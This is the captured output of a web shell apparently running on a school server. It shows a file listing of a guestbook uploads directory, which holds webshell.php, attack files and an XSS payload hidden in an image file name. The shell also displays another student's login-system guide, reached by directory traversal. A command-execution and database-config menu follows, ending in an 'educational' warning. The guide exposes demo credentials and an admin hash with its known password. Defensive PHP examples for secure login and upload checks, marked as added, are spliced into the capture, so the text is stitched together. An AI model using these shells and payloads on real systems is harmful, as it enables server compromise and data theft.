🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png
📄 0tk5j14v024b1.jpg
📄 300px-Cursed_Cat.jpg
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg
📄 Bill-Gates-Paul-Allen-2013.jpg
📄 CV Jasper Kramp.png
📄 Cat profile.png
📄 Fronalpstock_big.jpg
📄 Krik en las.jpg
📄 Krik.jpg
📄 Pino-dood-03.jpg
📄 Shellz.php
📄 Ted_Kaczynski_2_(cropped).jpg
📄 Tux.svg.png
📄 Z.png
📄 android.jpg
📄 apple.php
📄 cianancatfish.jpg
📄 downloads (1).jpeg
📄 downloads.jpeg
📄 epresso.jpg
📄 fake_photo.png
📄 hand.jpg
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg
📄 image.png
📄 images.jpeg
📄 info.php
📄 inject.php
📄 instant_redirect.jpg
📄 japper.jpg
📄 koekiemonster-3.jpg
📄 logo.png
📄 muis.jpg
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg
📄 picobellobv.jpeg
📄 redirect.php
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg
📄 sdfsa.png
📄 sneaky.svg
📄 taylor.webp
📄 test.html
📄 testpreg.php
📄 testpreg1.php
📄 testtest.php.JPG
📄 ultimate_attack.gif
📄 ultimate_attack.php
📄 ultimate_attack.svg
📄 wallpaper.jpg
📄 webshell.php

📄 Viewing: ./../../l7-pro-2-e-learning-2023-Epolleke/LOGIN_GUIDE.md

# 🔐 Login System - Quick Start Guide

## Features Added

✅ **User Registration** - Create new accounts  
✅ **User Login** - Secure authentication  
✅ **Session Management** - Stay logged in  
✅ **User Progress Tracking** - Save progress per user  
✅ **Guest Mode** - Practice without account  

## 🚀 Quick Start

### Access the Application

1. **Open**: http://localhost/login.html
2. **Login with demo account**:
   - Username: `demo`
   - Password: `demo123`
3. **Or create a new account**

### Demo Account

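The database comes pre-loaded with a demo account. Its credentials are published in this guide, so remove or disable the account on any deployment that others can reach: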

```
Username: demo
Password: demo123
```

## 📝 How It Works

### 1. **Login Page** (`login.html`)
- Beautiful auth interface
- Login form
- Registration form
- Guest access option

### 2. **User Flow**

```
┌─────────────┐
│ login.html  │
└──────┬──────┘
       │
       ├─► Login ──────► Main App (logged in)
       │
       ├─► Register ───► Login ──► Main App
       │
       └─► Guest ──────► Main App (guest mode)
```

### 3. **API Endpoints**

#### Register New User
```javascript
POST /php/register.php
{
  "username": "john",
  "email": "john@example.com",
  "password": "secret123",
  "full_name": "John Doe"
}
```

#### Login
```javascript
POST /php/login.php
{
  "username": "demo",
  "password": "demo123"
}
```

#### Check Auth Status
```javascript
GET /php/check_auth.php
```

#### Logout
```javascript
POST /php/logout.php
```

## 🗄️ Database Changes

### New Table: `users`

```sql
CREATE TABLE users (
    user_id INT PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(50) UNIQUE,
    email VARCHAR(100) UNIQUE,
    password_hash VARCHAR(255),
    full_name VARCHAR(100),
    created_at TIMESTAMP,
    last_login TIMESTAMP,
    is_active BOOLEAN
);
```

### Updated Table: `user_progress`

Now tracks progress per user:

```sql
ALTER TABLE user_progress ADD COLUMN user_id INT;
```

## 🎨 Features

### Header Changes
- Shows username when logged in
- Logout button
- Login button for guests

### Progress Tracking
- **Logged in users**: Progress saved to database
- **Guest users**: Progress in session only

## 📱 Usage Examples

### 1. Create Account

```text
// Navigate to login page
http://localhost/login.html

// Click "Register here"
// Fill form:
- Username: myuser
- Email: myuser@example.com  
- Password: mypass123
- Confirm: mypass123

// Click "Create Account"
// Automatically redirected to login
```

### 2. Login

```text
// Enter credentials:
- Username: demo
- Password: demo123

// Click "Login"
// Redirected to main app
// Username shown in header
```

### 3. Practice as User

```text
// All progress is saved to your account
// View your statistics
// Progress persists across sessions
```

### 4. Continue as Guest

```text
// Click "Continue as Guest"
// Practice without account
// Progress NOT saved
```

## 🔒 Security Features

✅ **Password Hashing** - bcrypt password hashes  
✅ **SQL Injection Protection** - Prepared statements  
✅ **Session Management** - Secure PHP sessions  
✅ **Input Validation** - Server-side validation  
✅ **XSS Protection** - Sanitized outputs  
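
How the first three items fit together in a login check, as an added illustration that is not taken from the project's `login.php`. The function names `attempt_login()` and `establish_session()`, the in-memory SQLite database and the seeded `demo` row are assumptions so the script runs on its own; column names follow the `users` table above.

```php
<?php
// Added example, not the project's code. Function names are hypothetical;
// the SQLite database and demo row are constructed so this runs offline.
declare(strict_types=1);

function attempt_login(PDO $db, string $username, string $password): ?array
{
    // Prepared statement: the username is bound, never concatenated into SQL.
    $stmt = $db->prepare(
        'SELECT user_id, username, password_hash FROM users
         WHERE username = :u AND is_active = 1'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Unknown users are checked against a dummy hash, so both failure paths
    // cost one bcrypt computation and give the same generic result.
    static $dummy = null;
    $dummy ??= password_hash('placeholder', PASSWORD_BCRYPT);
    $valid = password_verify($password, $row['password_hash'] ?? $dummy);

    return ($valid && $row !== false)
        ? ['user_id' => (int) $row['user_id'], 'username' => $row['username']]
        : null;
}

function establish_session(array $user): void
{
    session_start();
    session_regenerate_id(true);   // new ID after login (session fixation)
    $_SESSION['user_id'] = $user['user_id'];
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT UNIQUE,
           password_hash TEXT, is_active INTEGER DEFAULT 1)');
$db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)')
   ->execute(['demo', password_hash('demo123', PASSWORD_BCRYPT)]);
// Constructed inputs: valid login, wrong password, SQL metacharacters.
$attempts = [['demo', 'demo123'], ['demo', 'wrong'], ["demo' OR '1'='1", 'x']];
foreach ($attempts as [$u, $p]) {
    $user = attempt_login($db, $u, $p);
    if ($user !== null) {
        establish_session($user);
    }
    printf("%-18s %s\n", $u, $user ? 'accepted' : 'rejected');
}
```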

## 🧪 Testing

### Test Registration

1. Go to: http://localhost/login.html
2. Click "Register here"
3. Create account with:
   - Username: testuser
   - Email: test@test.com
   - Password: test123
4. Should see success message

### Test Login

1. Use demo account or your new account
2. Should redirect to main app
3. Username should appear in header

### Test Logout

1. Click "Logout" in header
2. Should redirect to login page
3. Session cleared

### Test Guest Mode

1. Click "Continue as Guest"
2. Can practice normally
3. No username in header
4. Progress not saved

## 🐛 Troubleshooting

### "Username already exists"
- Username must be unique
- Try different username

### "Invalid username or password"
- Check caps lock
- Verify password is correct
- Use demo account to test

### Can't see login button
- Clear browser cache
- Hard refresh: Ctrl+F5

### Session not persisting
- Check browser cookies enabled
- Clear cookies and try again

## 📊 Database Management

### View Users

```sql
-- Open phpMyAdmin: http://localhost:8080
SELECT * FROM users;
```

### Create Admin User

```sql
INSERT INTO users (username, email, password_hash, full_name)
VALUES (
    'admin',
    'admin@example.com',
    '$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi',
    'Administrator'
);
-- Password: password
```

### Reset User Password

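```php
<?php
// Generate a new bcrypt hash for the replacement password
$new_hash = password_hash('newpassword123', PASSWORD_BCRYPT);
echo $new_hash;
```

```sql
-- Update database: put the hash printed above in place of the placeholder
UPDATE users
SET password_hash = '$2y$10$...'
WHERE username = 'demo';
```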

## 🎯 Next Steps

1. ✅ Login system is working
2. ✅ User registration available
3. ✅ Progress tracking implemented
4. 📧 Add email verification (optional)
5. Add password reset (optional)
6. 👥 Add user profiles (optional)

## 🎉 Success!

Your English Vocabulary Learning app now has:
- ✅ Full authentication system
- ✅ User registration
- ✅ Secure login
- ✅ Progress tracking per user
- ✅ Guest mode option

**Try it now**: http://localhost/login.html

Login with:
- Username: `demo`
- Password: `demo123`

---

**Happy Learning! 🎓**

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📁 Show directory | 🔄 Show processes | Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!
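
The listing above shows `.php` files, a double extension (`testtest.php.JPG`), an SVG and a file name carrying HTML markup, all stored under their client-supplied names in a web-served uploads directory. The following is an added example of the server-side check that prevents this, not code from the page: `stored_name_for_upload()` is a hypothetical name, two sample names are borrowed from the listing, and all file contents are constructed.

```php
<?php
// Added example, not code from the page. stored_name_for_upload() is a
// hypothetical name; all sample bytes below are constructed.
declare(strict_types=1);

// Content types the guestbook accepts, mapped to the extension we assign.
const ALLOWED_TYPES = [
    'image/png' => 'png', 'image/jpeg' => 'jpg',
    'image/gif' => 'gif', 'image/webp' => 'webp',
];

function stored_name_for_upload(string $bytes): ?string
{
    // Type comes from the content, never from the client-supplied name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    $ext  = is_string($mime) ? (ALLOWED_TYPES[$mime] ?? null) : null;
    if ($ext === null) {
        return null;                 // PHP source, SVG, HTML: refused
    }
    if (@getimagesizefromstring($bytes) === false) {
        return null;                 // header does not parse as an image
    }
    // Random server-chosen name with an allowlisted extension: no ".php",
    // no double extension, no markup from the original name reaches disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed 1x1 PNG.
$png = base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
);
$uploads = [
    'holiday.png'       => $png,
    'testtest.php.JPG'  => $png,
    "' onerror='x'.png" => $png,
    'avatar.png'        => "<?php echo 'not an image'; ?>",
    'sneaky.svg'        => '<svg xmlns="http://www.w3.org/2000/svg"></svg>',
];
foreach ($uploads as $clientName => $bytes) {
    $stored = stored_name_for_upload($bytes) ?? 'REFUSED';
    // Escape the client name whenever it is displayed.
    printf("%-34s -> %s\n", htmlspecialchars($clientName, ENT_QUOTES), $stored);
}
```

Storing uploads outside the web root, or disabling script execution for the uploads directory, keeps a file that slips past this check from running.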